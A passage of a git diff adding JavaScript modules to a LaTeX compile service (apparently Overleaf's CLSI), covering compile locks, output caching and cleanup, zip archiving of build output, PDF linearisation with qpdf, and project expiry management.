env, + stdio: ['pipe', 'pipe', 'ignore'], + }) + + let stdout = '' + proc.stdout.setEncoding('utf8').on('data', data => (stdout += data)) + + proc.on('error', function (err) { + logger.err( + { err, projectId, command, directory }, + 'error running command' + ) + return callback(err) + }) + + proc.on('close', function (code, signal) { + let err + logger.debug({ code, signal, projectId }, 'command exited') + if (signal === 'SIGTERM') { + // signal from kill method below + err = new Error('terminated') + err.terminated = true + return callback(err) + } else if (code === 1) { + // exit status from chktex + err = new Error('exited') + err.code = code + return callback(err) + } else { + return callback(null, { stdout }) + } + }) + + return proc.pid + }, // return process id to allow job to be killed if necessary + + kill(pid, callback) { + if (callback == null) { + callback = function () {} + } + try { + process.kill(-pid) // kill all processes in group + } catch (err) { + return callback(err) + } + return callback() + }, + + canRunSyncTeXInOutputDir() { + return true + }, +} + +module.exports.promises = { + run: promisify(CommandRunner.run), + kill: promisify(CommandRunner.kill), +} diff --git a/services/clsi/app/js/LockManager.js b/services/clsi/app/js/LockManager.js new file mode 100644 index 0000000..a44810f --- /dev/null +++ b/services/clsi/app/js/LockManager.js @@ -0,0 +1,66 @@ +const logger = require('@overleaf/logger') +const Errors = require('./Errors') +const RequestParser = require('./RequestParser') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') + +// The lock timeout should be higher than the maximum end-to-end compile time. +// Here, we use the maximum compile timeout plus 2 minutes. +const LOCK_TIMEOUT_MS = RequestParser.MAX_TIMEOUT * 1000 + 120000 + +const LOCKS = new Map() + +function acquire(key) { + const currentLock = LOCKS.get(key) + if (currentLock != null) { + if (currentLock.isExpired()) { + logger.warn({ key }, 'Compile lock expired') + currentLock.release() + } else { + throw new Errors.AlreadyCompilingError('compile in progress') + } + } + + checkConcurrencyLimit() + + const lock = new Lock(key) + LOCKS.set(key, lock) + return lock +} + +function checkConcurrencyLimit() { + Metrics.gauge('concurrent_compile_requests', LOCKS.size) + + if (LOCKS.size <= Settings.compileConcurrencyLimit) { + return + } + + Metrics.inc('exceeded-compilier-concurrency-limit') + + throw new Errors.TooManyCompileRequestsError( + 'too many concurrent compile requests' + ) +} + +class Lock { + constructor(key) { + this.key = key + this.expiresAt = Date.now() + LOCK_TIMEOUT_MS + } + + isExpired() { + return Date.now() >= this.expiresAt + } + + release() { + const lockWasActive = LOCKS.delete(this.key) + if (!lockWasActive) { + logger.error({ key: this.key }, 'Lock was released twice') + } + if (this.isExpired()) { + Metrics.inc('compile_lock_expired_before_release') + } + } +} + +module.exports = { acquire } diff --git a/services/clsi/app/js/Metrics.js b/services/clsi/app/js/Metrics.js new file mode 100644 index 0000000..f0e5779 --- /dev/null +++ b/services/clsi/app/js/Metrics.js @@ -0,0 +1,3 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +module.exports = require('@overleaf/metrics') diff --git a/services/clsi/app/js/OutputCacheManager.js b/services/clsi/app/js/OutputCacheManager.js new file mode 100644 index 0000000..a1a0a89 --- /dev/null +++ b/services/clsi/app/js/OutputCacheManager.js @@ -0,0 +1,688 @@ +let OutputCacheManager +const { callbackify, promisify } = require('node:util') +const async = require('async') +const fs = require('node:fs') +const Path = require('node:path') +const logger = require('@overleaf/logger') +const _ = require('lodash') +const Settings = require('@overleaf/settings') +const crypto = require('node:crypto') +const Metrics = require('./Metrics') + +const OutputFileOptimiser = require('./OutputFileOptimiser') +const ContentCacheManager = require('./ContentCacheManager') +const { + QueueLimitReachedError, + TimedOutError, + NoXrefTableError, +} = require('./Errors') + +const OLDEST_BUILD_DIR = new Map() +const PENDING_PROJECT_ACTIONS = new Map() + +function init() { + doInit().catch(err => { + logger.fatal({ err }, 'low level error setting up cleanup of output dir') + // consider shutting down? + }) +} + +async function doInit() { + await fillCache() + const oldestTimestamp = await runBulkCleanup() + scheduleBulkCleanup(oldestTimestamp) +} + +function scheduleBulkCleanup(oldestTimestamp) { + const delay = + Math.max(OutputCacheManager.CACHE_AGE + oldestTimestamp - Date.now(), 0) + + 60 * 1000 + setTimeout(async function () { + const oldestTimestamp = await runBulkCleanup() + scheduleBulkCleanup(oldestTimestamp) + }, delay) +} + +async function fillCache() { + const handle = await fs.promises.opendir(Settings.path.outputDir) + try { + for await (const { name: projectIdAndUserId } of handle) { + OLDEST_BUILD_DIR.set( + Path.join(Settings.path.outputDir, projectIdAndUserId), + // Queue them for cleanup in the next hour. + Date.now() - Math.random() * OutputCacheManager.CACHE_AGE + ) + } + } finally { + try { + await handle.close() + } catch (e) {} + } +} + +async function runBulkCleanup() { + const cleanupThreshold = Date.now() - OutputCacheManager.CACHE_AGE + let oldestTimestamp = Date.now() + for (const [dir, timeStamp] of OLDEST_BUILD_DIR.entries()) { + if (timeStamp < cleanupThreshold) { + await cleanupDirectory(dir, { limit: OutputCacheManager.CACHE_LIMIT }) + } else if (timeStamp < oldestTimestamp) { + oldestTimestamp = timeStamp + } + } + return oldestTimestamp +} + +async function cleanupDirectory(dir, options) { + return await queueDirOperation(dir, async () => { + try { + await OutputCacheManager.promises.expireOutputFiles(dir, options) + } catch (err) { + logger.err({ dir, err }, 'cleanup of output directory failed') + } + }) +} + +/** + * @template T + * + * @param {string} dir + * @param {() => Promise} fn + * @return {Promise} + */ +async function queueDirOperation(dir, fn) { + const pending = PENDING_PROJECT_ACTIONS.get(dir) || Promise.resolve() + const p = pending.then(fn, fn).finally(() => { + if (PENDING_PROJECT_ACTIONS.get(dir) === p) { + PENDING_PROJECT_ACTIONS.delete(dir) + } + }) + PENDING_PROJECT_ACTIONS.set(dir, p) + return p +} + +module.exports = OutputCacheManager = { + CONTENT_SUBDIR: 'content', + CACHE_SUBDIR: 'generated-files', + ARCHIVE_SUBDIR: 'archived-logs', + // build id is HEXDATE-HEXRANDOM from Date.now() and RandomBytes + BUILD_REGEX: /^[0-9a-f]+-[0-9a-f]+$/, + CONTENT_REGEX: /^[0-9a-f]+-[0-9a-f]+$/, + CACHE_LIMIT: 2, // maximum number of cache directories + CACHE_AGE: 90 * 60 * 1000, // up to 90 minutes old + + init, + queueDirOperation: callbackify(queueDirOperation), + + path(buildId, file) { + // used by static server, given build id return '.cache/clsi/buildId' + if (buildId.match(OutputCacheManager.BUILD_REGEX)) { + return Path.join(OutputCacheManager.CACHE_SUBDIR, buildId, file) + } else { + // for invalid build id, return top level + return file + } + }, + + generateBuildId(callback) { + // generate a secure build id from Date.now() and 8 random bytes in hex + crypto.randomBytes(8, function (err, buf) { + if (err) { + return callback(err) + } + const random = buf.toString('hex') + const date = Date.now().toString(16) + callback(err, `${date}-${random}`) + }) + }, + + saveOutputFiles( + { request, stats, timings }, + outputFiles, + compileDir, + outputDir, + callback + ) { + const getBuildId = cb => { + if (request.buildId) return cb(null, request.buildId) + OutputCacheManager.generateBuildId(cb) + } + getBuildId(function (err, buildId) { + if (err) { + return callback(err) + } + if (!OLDEST_BUILD_DIR.has(outputDir)) { + // Register for cleanup + OLDEST_BUILD_DIR.set(outputDir, Date.now()) + } + + OutputCacheManager.queueDirOperation( + outputDir, + () => + OutputCacheManager.promises.saveOutputFilesInBuildDir( + outputFiles, + compileDir, + outputDir, + buildId + ), + function (err, result) { + if (err) { + return callback(err) + } + OutputCacheManager.collectOutputPdfSize( + result, + outputDir, + stats, + (err, outputFiles) => { + if (err) return callback(err, { outputFiles, buildId }) + + const enablePdfCaching = request.enablePdfCaching + const enablePdfCachingDark = + Settings.enablePdfCachingDark && !request.enablePdfCaching + if ( + !Settings.enablePdfCaching || + (!enablePdfCaching && !enablePdfCachingDark) + ) { + return callback(null, { outputFiles, buildId }) + } + + OutputCacheManager.saveStreamsInContentDir( + { request, stats, timings, enablePdfCachingDark }, + outputFiles, + compileDir, + outputDir, + (err, status) => { + Metrics.inc('pdf-caching-status', 1, { + status, + ...request.metricsOpts, + }) + if (err) { + logger.warn( + { err, outputDir, stats, timings }, + 'pdf caching failed' + ) + return callback(null, { outputFiles, buildId }) + } + callback(err, { outputFiles, buildId }) + } + ) + } + ) + } + ) + }) + }, + + saveOutputFilesInBuildDir( + outputFiles, + compileDir, + outputDir, + buildId, + callback + ) { + // make a compileDir/CACHE_SUBDIR/build_id directory and + // copy all the output files into it + // Put the files into a new cache subdirectory + const cacheDir = Path.join( + outputDir, + OutputCacheManager.CACHE_SUBDIR, + buildId + ) + // Is it a per-user compile? check if compile directory is PROJECTID-USERID + const perUser = Path.basename(compileDir).match( + /^[0-9a-f]{24}-[0-9a-f]{24}$/ + ) + + // Archive logs in background + if (Settings.clsi?.archive_logs || Settings.clsi?.strace) { + OutputCacheManager.archiveLogs( + outputFiles, + compileDir, + outputDir, + buildId, + function (err) { + if (err) { + return logger.warn({ err }, 'erroring archiving log files') + } + } + ) + } + + // make the new cache directory + fs.mkdir(cacheDir, { recursive: true }, function (err) { + if (err) { + logger.error( + { err, directory: cacheDir }, + 'error creating cache directory' + ) + callback(err) + } else { + // copy all the output files into the new cache directory + const results = [] + const dirCache = new Set() + dirCache.add(cacheDir) + async.mapSeries( + outputFiles, + function (file, cb) { + // don't send dot files as output, express doesn't serve them + if (OutputCacheManager._fileIsHidden(file.path)) { + logger.debug( + { compileDir, path: file.path }, + 'ignoring dotfile in output' + ) + return cb() + } + // copy other files into cache directory if valid + const src = Path.join(compileDir, file.path) + const dst = Path.join(cacheDir, file.path) + OutputCacheManager._checkIfShouldCopy( + src, + function (err, shouldCopy) { + if (err) { + return cb(err) + } + if (!shouldCopy) { + return cb() + } + OutputCacheManager._copyFile(src, dst, dirCache, err => { + if (err) { + return cb(err) + } + file.build = buildId + results.push(file) + cb() + }) + } + ) + }, + function (err) { + if (err) { + callback(err) + // clean up the directory we just created + fs.rm(cacheDir, { force: true, recursive: true }, function (err) { + if (err) { + return logger.error( + { err, dir: cacheDir }, + 'error removing cache dir after failure' + ) + } + }) + } else { + // pass back the list of new files in the cache + callback(null, results) + // let file expiry run in the background, expire all previous files if per-user + cleanupDirectory(outputDir, { + keep: buildId, + limit: perUser ? 1 : null, + }).catch(() => {}) + } + } + ) + } + }) + }, + + collectOutputPdfSize(outputFiles, outputDir, stats, callback) { + const outputFile = outputFiles.find(x => x.path === 'output.pdf') + if (!outputFile) return callback(null, outputFiles) + const outputFilePath = Path.join( + outputDir, + OutputCacheManager.path(outputFile.build, outputFile.path) + ) + fs.stat(outputFilePath, (err, stat) => { + if (err) return callback(err, outputFiles) + + outputFile.size = stat.size + stats['pdf-size'] = outputFile.size + callback(null, outputFiles) + }) + }, + + saveStreamsInContentDir( + { request, stats, timings, enablePdfCachingDark }, + outputFiles, + compileDir, + outputDir, + callback + ) { + const cacheRoot = Path.join(outputDir, OutputCacheManager.CONTENT_SUBDIR) + // check if content dir exists + OutputCacheManager.ensureContentDir(cacheRoot, function (err, contentDir) { + if (err) return callback(err, 'content-dir-unavailable') + + const outputFile = outputFiles.find(x => x.path === 'output.pdf') + if (outputFile) { + // possibly we should copy the file from the build dir here + const outputFilePath = Path.join( + outputDir, + OutputCacheManager.path(outputFile.build, outputFile.path) + ) + const pdfSize = outputFile.size + const timer = new Metrics.Timer( + 'compute-pdf-ranges', + 1, + request.metricsOpts + ) + ContentCacheManager.update( + { + contentDir, + filePath: outputFilePath, + pdfSize, + pdfCachingMinChunkSize: request.pdfCachingMinChunkSize, + compileTime: timings.compile, + }, + function (err, result) { + if (err && err instanceof NoXrefTableError) { + return callback(null, err.message) + } + if (err && err instanceof QueueLimitReachedError) { + logger.warn({ err, outputDir }, 'pdf caching queue limit reached') + stats['pdf-caching-queue-limit-reached'] = 1 + return callback(null, 'queue-limit') + } + if (err && err instanceof TimedOutError) { + logger.warn( + { err, outputDir, stats, timings }, + 'pdf caching timed out' + ) + stats['pdf-caching-timed-out'] = 1 + return callback(null, 'timed-out') + } + if (err) return callback(err, 'failed') + const { + contentRanges, + newContentRanges, + reclaimedSpace, + overheadDeleteStaleHashes, + timedOutErr, + startXRefTable, + } = result + + let status = 'success' + if (timedOutErr) { + // Soft failure: let the frontend use partial set of ranges. + logger.warn( + { + err: timedOutErr, + overheadDeleteStaleHashes, + outputDir, + stats, + timings, + }, + 'pdf caching timed out - soft failure' + ) + stats['pdf-caching-timed-out'] = 1 + status = 'timed-out-soft-failure' + } + + if (enablePdfCachingDark) { + // In dark mode we are doing the computation only and do not emit + // any ranges to the frontend. + } else { + outputFile.contentId = Path.basename(contentDir) + outputFile.ranges = contentRanges + outputFile.startXRefTable = startXRefTable + } + + timings['compute-pdf-caching'] = timer.done() + stats['pdf-caching-n-ranges'] = contentRanges.length + stats['pdf-caching-total-ranges-size'] = contentRanges.reduce( + (sum, next) => sum + (next.end - next.start), + 0 + ) + stats['pdf-caching-n-new-ranges'] = newContentRanges.length + stats['pdf-caching-new-ranges-size'] = newContentRanges.reduce( + (sum, next) => sum + (next.end - next.start), + 0 + ) + stats['pdf-caching-reclaimed-space'] = reclaimedSpace + timings['pdf-caching-overhead-delete-stale-hashes'] = + overheadDeleteStaleHashes + callback(null, status) + } + ) + } else { + callback(null, 'missing-pdf') + } + }) + }, + + ensureContentDir(contentRoot, callback) { + fs.mkdir(contentRoot, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + fs.readdir(contentRoot, function (err, results) { + if (err) return callback(err) + const dirs = results.sort() + const contentId = dirs.find(dir => + OutputCacheManager.BUILD_REGEX.test(dir) + ) + if (contentId) { + callback(null, Path.join(contentRoot, contentId)) + } else { + // make a content directory + OutputCacheManager.generateBuildId(function (err, contentId) { + if (err) { + return callback(err) + } + const contentDir = Path.join(contentRoot, contentId) + fs.mkdir(contentDir, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + callback(null, contentDir) + }) + }) + } + }) + }) + }, + + archiveLogs(outputFiles, compileDir, outputDir, buildId, callback) { + const archiveDir = Path.join( + outputDir, + OutputCacheManager.ARCHIVE_SUBDIR, + buildId + ) + logger.debug({ dir: archiveDir }, 'archiving log files for project') + fs.mkdir(archiveDir, { recursive: true }, function (err) { + if (err) { + return callback(err) + } + const dirCache = new Set() + dirCache.add(archiveDir) + async.mapSeries( + outputFiles, + function (file, cb) { + const src = Path.join(compileDir, file.path) + const dst = Path.join(archiveDir, file.path) + OutputCacheManager._checkIfShouldArchive( + src, + function (err, shouldArchive) { + if (err) { + return cb(err) + } + if (!shouldArchive) { + return cb() + } + OutputCacheManager._copyFile(src, dst, dirCache, cb) + } + ) + }, + callback + ) + }) + }, + + expireOutputFiles(outputDir, options, callback) { + // look in compileDir for build dirs and delete if > N or age of mod time > T + const cleanupAll = cb => { + fs.rm(outputDir, { force: true, recursive: true }, err => { + if (err) { + return cb(err) + } + // Drop reference after successful cleanup of the output dir. + OLDEST_BUILD_DIR.delete(outputDir) + cb(null) + }) + } + + const cacheRoot = Path.join(outputDir, OutputCacheManager.CACHE_SUBDIR) + fs.readdir(cacheRoot, function (err, results) { + if (err) { + if (err.code === 'ENOENT') { + // cache directory is empty + return cleanupAll(callback) + } + logger.error({ err, projectId: cacheRoot }, 'error clearing cache') + return callback(err) + } + + const dirs = results.sort().reverse() + const currentTime = Date.now() + + let oldestDirTimeToKeep = 0 + + const isExpired = function (dir, index) { + if (options?.keep === dir) { + // This is the directory we just created for the compile request. + oldestDirTimeToKeep = currentTime + return false + } + // remove any directories over the requested (non-null) limit + if (options?.limit != null && index > options.limit) { + return true + } + // remove any directories over the hard limit + if (index > OutputCacheManager.CACHE_LIMIT) { + return true + } + // we can get the build time from the first part of the directory name DDDD-RRRR + // DDDD is date and RRRR is random bytes + const dirTime = parseInt(dir.split('-')[0], 16) + const age = currentTime - dirTime + const expired = age > OutputCacheManager.CACHE_AGE + if (expired) { + return true + } + oldestDirTimeToKeep = dirTime + return false + } + + const toRemove = _.filter(dirs, isExpired) + if (toRemove.length === dirs.length) { + // No builds left after cleanup. + return cleanupAll(callback) + } + + const removeDir = (dir, cb) => + fs.rm( + Path.join(cacheRoot, dir), + { force: true, recursive: true }, + function (err, result) { + logger.debug({ cache: cacheRoot, dir }, 'removed expired cache dir') + if (err) { + logger.error({ err, dir }, 'cache remove error') + } + cb(err, result) + } + ) + async.eachSeries( + toRemove, + (dir, cb) => removeDir(dir, cb), + err => { + if (err) { + // On error: keep the timestamp in the past. + // The next iteration of the cleanup loop will retry the deletion. + return callback(err) + } + // On success: push the timestamp into the future. + OLDEST_BUILD_DIR.set(outputDir, oldestDirTimeToKeep) + callback(null) + } + ) + }) + }, + + _fileIsHidden(path) { + return path?.match(/^\.|\/\./) != null + }, + + _ensureParentExists(dst, dirCache, callback) { + let parent = Path.dirname(dst) + if (dirCache.has(parent)) { + callback() + } else { + fs.mkdir(parent, { recursive: true }, err => { + if (err) return callback(err) + while (!dirCache.has(parent)) { + dirCache.add(parent) + parent = Path.dirname(parent) + } + callback() + }) + } + }, + + _copyFile(src, dst, dirCache, callback) { + OutputCacheManager._ensureParentExists(dst, dirCache, err => { + if (err) { + logger.warn( + { err, dst }, + 'creating parent directory in output cache failed' + ) + return callback(err, false) + } + // copy output file into the cache + fs.copyFile(src, dst, function (err) { + if (err?.code === 'ENOENT') { + logger.warn( + { err, file: src }, + 'file has disappeared when copying to build cache' + ) + callback(err, false) + } else if (err) { + logger.error({ err, src, dst }, 'copy error for file in cache') + callback(err) + } else { + if (Settings.clsi?.optimiseInDocker) { + // don't run any optimisations on the pdf when they are done + // in the docker container + callback() + } else { + // call the optimiser for the file too + OutputFileOptimiser.optimiseFile(src, dst, callback) + } + } + }) + }) + }, + + _checkIfShouldCopy(src, callback) { + callback(null, !Path.basename(src).match(/^strace/)) + }, + + _checkIfShouldArchive(src, callback) { + if (Path.basename(src).match(/^strace/)) { + return callback(null, true) + } + const basename = Path.basename(src) + if ( + Settings.clsi?.archive_logs && + ['output.log', 'output.blg'].includes(basename) + ) { + return callback(null, true) + } + callback(null, false) + }, +} + +OutputCacheManager.promises = { + expireOutputFiles: promisify(OutputCacheManager.expireOutputFiles), + saveOutputFiles: promisify(OutputCacheManager.saveOutputFiles), + saveOutputFilesInBuildDir: promisify( + OutputCacheManager.saveOutputFilesInBuildDir + ), + queueDirOperation, +} diff --git a/services/clsi/app/js/OutputController.js b/services/clsi/app/js/OutputController.js new file mode 100644 index 0000000..e5048c4 --- /dev/null +++ b/services/clsi/app/js/OutputController.js @@ -0,0 +1,23 @@ +const OutputFileArchiveManager = require('./OutputFileArchiveManager') +const { expressify } = require('@overleaf/promise-utils') +const { pipeline } = require('node:stream/promises') + +async function createOutputZip(req, res) { + const { + project_id: projectId, + user_id: userId, + build_id: buildId, + } = req.params + + const archive = await OutputFileArchiveManager.archiveFilesForBuild( + projectId, + userId, + buildId + ) + + res.attachment('output.zip') + res.setHeader('X-Content-Type-Options', 'nosniff') + await pipeline(archive, res) +} + +module.exports = { createOutputZip: expressify(createOutputZip) } diff --git a/services/clsi/app/js/OutputFileArchiveManager.js b/services/clsi/app/js/OutputFileArchiveManager.js new file mode 100644 index 0000000..64c5198 --- /dev/null +++ b/services/clsi/app/js/OutputFileArchiveManager.js @@ -0,0 +1,113 @@ +const archiver = require('archiver') +const OutputCacheManager = require('./OutputCacheManager') +const OutputFileFinder = require('./OutputFileFinder') +const Settings = require('@overleaf/settings') +const { open } = require('node:fs/promises') +const { NotFoundError } = require('./Errors') +const logger = require('@overleaf/logger') + +// NOTE: Updating this list requires a corresponding change in +// * services/web/frontend/js/features/pdf-preview/util/file-list.ts +const ignoreFiles = ['output.fls', 'output.fdb_latexmk'] + +function getContentDir(projectId, userId) { + let subDir + if (userId != null) { + subDir = `${projectId}-${userId}` + } else { + subDir = projectId + } + return `${Settings.path.outputDir}/${subDir}/` +} + +module.exports = { + async archiveFilesForBuild(projectId, userId, build) { + logger.debug({ projectId, userId, build }, 'Will create zip file') + + const contentDir = getContentDir(projectId, userId) + + const outputFiles = await this._getAllOutputFiles( + contentDir, + projectId, + userId, + build + ) + + const archive = archiver('zip') + + archive.on('error', err => { + logger.warn( + { err, projectId, userId, build }, + 'error emitted when creating output files archive' + ) + }) + + archive.on('warning', err => { + logger.warn( + { err, projectId, userId, build }, + 'warning emitted when creating output files archive' + ) + }) + + const missingFiles = [] + + for (const { path } of outputFiles) { + let fileHandle + try { + fileHandle = await open( + `${contentDir}${OutputCacheManager.path(build, path)}` + ) + } catch (error) { + logger.warn( + { path, error, projectId, userId, build }, + 'error opening file to add to output files archive' + ) + missingFiles.push(path) + continue + } + const fileStream = fileHandle.createReadStream() + archive.append(fileStream, { name: path }) + } + + if (missingFiles.length > 0) { + archive.append(missingFiles.join('\n'), { + name: 'missing_files.txt', + }) + } + + archive.finalize().catch(error => { + logger.error( + { error, projectId, userId, build }, + 'error finalizing output files archive' + ) + }) + + return archive + }, + + async _getAllOutputFiles(contentDir, projectId, userId, build) { + try { + const { outputFiles } = await OutputFileFinder.promises.findOutputFiles( + [], + `${contentDir}${OutputCacheManager.path(build, '.')}` + ) + + return outputFiles.filter( + // Ignore the pdf, clsi-cache tar-ball and also ignore the files ignored by the frontend. + ({ path }) => + path !== 'output.pdf' && + path !== 'output.tar.gz' && + !ignoreFiles.includes(path) + ) + } catch (error) { + if ( + error.code === 'ENOENT' || + error.code === 'ENOTDIR' || + error.code === 'EACCES' + ) { + throw new NotFoundError('Output files not found') + } + throw error + } + }, +} diff --git a/services/clsi/app/js/OutputFileFinder.js b/services/clsi/app/js/OutputFileFinder.js new file mode 100644 index 0000000..e62038c --- /dev/null +++ b/services/clsi/app/js/OutputFileFinder.js @@ -0,0 +1,53 @@ +const Path = require('node:path') +const fs = require('node:fs') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') + +async function walkFolder(compileDir, d, files, allEntries) { + const dirents = await fs.promises.readdir(Path.join(compileDir, d), { + withFileTypes: true, + }) + for (const dirent of dirents) { + const p = Path.join(d, dirent.name) + if (dirent.isDirectory()) { + await walkFolder(compileDir, p, files, allEntries) + allEntries.push(p + '/') + } else if (dirent.isFile()) { + files.push(p) + allEntries.push(p) + } else { + allEntries.push(p) + } + } +} + +async function findOutputFiles(resources, directory) { + const files = [] + const allEntries = [] + await walkFolder(directory, '', files, allEntries) + + const incomingResources = new Set(resources.map(resource => resource.path)) + + const outputFiles = [] + for (const path of files) { + if (incomingResources.has(path)) continue + if (path === '.project-sync-state') continue + outputFiles.push({ + path, + type: Path.extname(path).replace(/^\./, '') || undefined, + }) + } + return { + outputFiles, + allEntries, + } +} + +module.exports = { + findOutputFiles: callbackifyMultiResult(findOutputFiles, [ + 'outputFiles', + 'allEntries', + ]), + promises: { + findOutputFiles, + }, +} diff --git a/services/clsi/app/js/OutputFileOptimiser.js b/services/clsi/app/js/OutputFileOptimiser.js new file mode 100644 index 0000000..09ca986 --- /dev/null +++ b/services/clsi/app/js/OutputFileOptimiser.js @@ -0,0 +1,100 @@ +/* eslint-disable + no-return-assign, + no-undef, + no-unused-vars, + n/no-deprecated-api, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let OutputFileOptimiser +const fs = require('node:fs') +const Path = require('node:path') +const { spawn } = require('node:child_process') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const _ = require('lodash') + +module.exports = OutputFileOptimiser = { + optimiseFile(src, dst, callback) { + // check output file (src) and see if we can optimise it, storing + // the result in the build directory (dst) + if (callback == null) { + callback = function () {} + } + if (src.match(/\/output\.pdf$/)) { + return OutputFileOptimiser.checkIfPDFIsOptimised( + src, + function (err, isOptimised) { + if (err != null || isOptimised) { + return callback(null) + } + return OutputFileOptimiser.optimisePDF(src, dst, callback) + } + ) + } else { + return callback(null) + } + }, + + checkIfPDFIsOptimised(file, callback) { + const SIZE = 16 * 1024 // check the header of the pdf + const result = Buffer.alloc(SIZE) // fills with zeroes by default + return fs.open(file, 'r', function (err, fd) { + if (err != null) { + return callback(err) + } + return fs.read(fd, result, 0, SIZE, 0, (errRead, bytesRead, buffer) => + fs.close(fd, function (errClose) { + if (errRead != null) { + return callback(errRead) + } + if (typeof errReadClose !== 'undefined' && errReadClose !== null) { + return callback(errClose) + } + const isOptimised = + buffer.toString('ascii').indexOf('/Linearized 1') >= 0 + return callback(null, isOptimised) + }) + ) + }) + }, + + optimisePDF(src, dst, callback) { + if (callback == null) { + callback = function () {} + } + const tmpOutput = dst + '.opt' + const args = ['--linearize', '--newline-before-endstream', src, tmpOutput] + logger.debug({ args }, 'running qpdf command') + + const timer = new Metrics.Timer('qpdf') + const proc = spawn('qpdf', args, { stdio: 'ignore' }) + callback = _.once(callback) // avoid double call back for error and close event + proc.on('error', function (err) { + logger.warn({ err, args }, 'qpdf failed') + return callback(null) + }) // ignore the error + return proc.on('close', function (code) { + timer.done() + if (code !== 0) { + logger.warn({ code, args }, 'qpdf returned error') + return callback(null) // ignore the error + } + return fs.rename(tmpOutput, dst, function (err) { + if (err != null) { + logger.warn( + { tmpOutput, dst }, + 'failed to rename output of qpdf command' + ) + } + return callback(null) + }) + }) + }, // ignore the error +} diff --git a/services/clsi/app/js/ProjectPersistenceManager.js b/services/clsi/app/js/ProjectPersistenceManager.js new file mode 100644 index 0000000..e96a459 --- /dev/null +++ b/services/clsi/app/js/ProjectPersistenceManager.js @@ -0,0 +1,247 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let ProjectPersistenceManager +const UrlCache = require('./UrlCache') +const CompileManager = require('./CompileManager') +const async = require('async') +const logger = require('@overleaf/logger') +const oneDay = 24 * 60 * 60 * 1000 +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { callbackify } = require('node:util') +const Path = require('node:path') +const fs = require('node:fs') + +// projectId -> timestamp mapping. +const LAST_ACCESS = new Map() + +async function collectDiskStats() { + const paths = [ + Settings.path.compilesDir, + Settings.path.outputDir, + Settings.path.clsiCacheDir, + ] + + const diskStats = {} + for (const path of paths) { + try { + const { blocks, bavail, bsize } = await fs.promises.statfs(path) + const stats = { + // Warning: these values will be wrong by a factor in Docker-for-Mac. + // See https://github.com/docker/for-mac/issues/2136 + total: blocks * bsize, // Total size of the file system in bytes + available: bavail * bsize, // Free space available to unprivileged users. + } + const diskAvailablePercent = (stats.available / stats.total) * 100 + Metrics.gauge('disk_available_percent', diskAvailablePercent, 1, { + path, + }) + const lowDisk = diskAvailablePercent < 10 + diskStats[path] = { stats, lowDisk } + } catch (err) { + logger.err({ err, path }, 'error getting disk usage') + } + } + return diskStats +} + +async function refreshExpiryTimeout() { + for (const [path, { stats, lowDisk }] of Object.entries( + await collectDiskStats() + )) { + const lowerExpiry = ProjectPersistenceManager.EXPIRY_TIMEOUT * 0.9 + if (lowDisk && Settings.project_cache_length_ms / 2 < lowerExpiry) { + logger.warn( + { + path, + stats, + newExpiryTimeoutInDays: (lowerExpiry / oneDay).toFixed(2), + }, + 'disk running low on space, modifying EXPIRY_TIMEOUT' + ) + ProjectPersistenceManager.EXPIRY_TIMEOUT = lowerExpiry + break + } + } +} + +module.exports = ProjectPersistenceManager = { + EXPIRY_TIMEOUT: Settings.project_cache_length_ms || oneDay * 2.5, + + promises: { + refreshExpiryTimeout, + }, + + refreshExpiryTimeout: callbackify(refreshExpiryTimeout), + + init() { + fs.readdir(Settings.path.compilesDir, (err, dirs) => { + if (err) { + logger.warn({ err }, 'cannot get project listing') + dirs = [] + } + + async.eachLimit( + dirs, + 10, + (projectAndUserId, cb) => { + const compileDir = Path.join( + Settings.path.compilesDir, + projectAndUserId + ) + const projectId = projectAndUserId.slice(0, 24) + fs.stat(compileDir, (err, stats) => { + if (err) { + // Schedule for immediate cleanup + LAST_ACCESS.set(projectId, 0) + } else { + // Cleanup eventually. + LAST_ACCESS.set(projectId, stats.mtime.getTime()) + } + cb() + }) + }, + () => { + setInterval( + () => { + ProjectPersistenceManager.refreshExpiryTimeout(() => { + ProjectPersistenceManager.clearExpiredProjects(err => { + if (err) { + logger.error({ err }, 'clearing expired projects failed') + } + }) + }) + }, + 10 * 60 * 1000 + ) + } + ) + }) + + // Collect disk stats frequently to have them ready the next time /metrics is scraped (60s +- jitter). + setInterval(() => { + collectDiskStats().catch(err => { + logger.err({ err }, 'low level error collecting disk stats') + }) + }, 50_000) + }, + + markProjectAsJustAccessed(projectId, callback) { + LAST_ACCESS.set(projectId, Date.now()) + callback() + }, + + clearExpiredProjects(callback) { + if (callback == null) { + callback = function () {} + } + return ProjectPersistenceManager._findExpiredProjectIds( + function (error, projectIds) { + if (error != null) { + return callback(error) + } + logger.debug({ projectIds }, 'clearing expired projects') + const jobs = Array.from(projectIds || []).map(projectId => + ( + projectId => callback => + ProjectPersistenceManager.clearProjectFromCache( + projectId, + { reason: 'expired' }, + function (err) { + if (err != null) { + logger.error({ err, projectId }, 'error clearing project') + } + return callback() + } + ) + )(projectId) + ) + return async.series(jobs, function (error) { + if (error != null) { + return callback(error) + } + return CompileManager.clearExpiredProjects( + ProjectPersistenceManager.EXPIRY_TIMEOUT, + error => callback(error) + ) + }) + } + ) + }, // ignore any errors from deleting directories + + clearProject(projectId, userId, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId, userId }, 'clearing project for user') + return CompileManager.clearProject(projectId, userId, function (error) { + if (error != null) { + return callback(error) + } + return ProjectPersistenceManager.clearProjectFromCache( + projectId, + { reason: 'cleared' }, + function (error) { + if (error != null) { + return callback(error) + } + return callback() + } + ) + }) + }, + + clearProjectFromCache(projectId, 